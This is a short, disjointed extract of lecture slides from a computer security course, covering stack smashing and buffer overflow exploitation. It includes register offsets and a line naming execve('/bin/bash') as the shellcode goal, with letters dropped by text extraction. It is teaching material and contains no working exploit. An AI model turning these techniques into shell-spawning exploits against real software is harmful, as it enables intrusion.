%ecx x + 8 (2 elem array)

%edx x + 9 (1 elem array)

We can determine x dynamically

Overview of Computer Security p.19

Constructing overow buffer

Stack Smashing Attack

Overview of Computer Security p.21

Exploiting buffer overows

Overview of Computer Security p.22

Java Crypto API

P: execve(/bin/bash, char argv, char envp) properly constructed!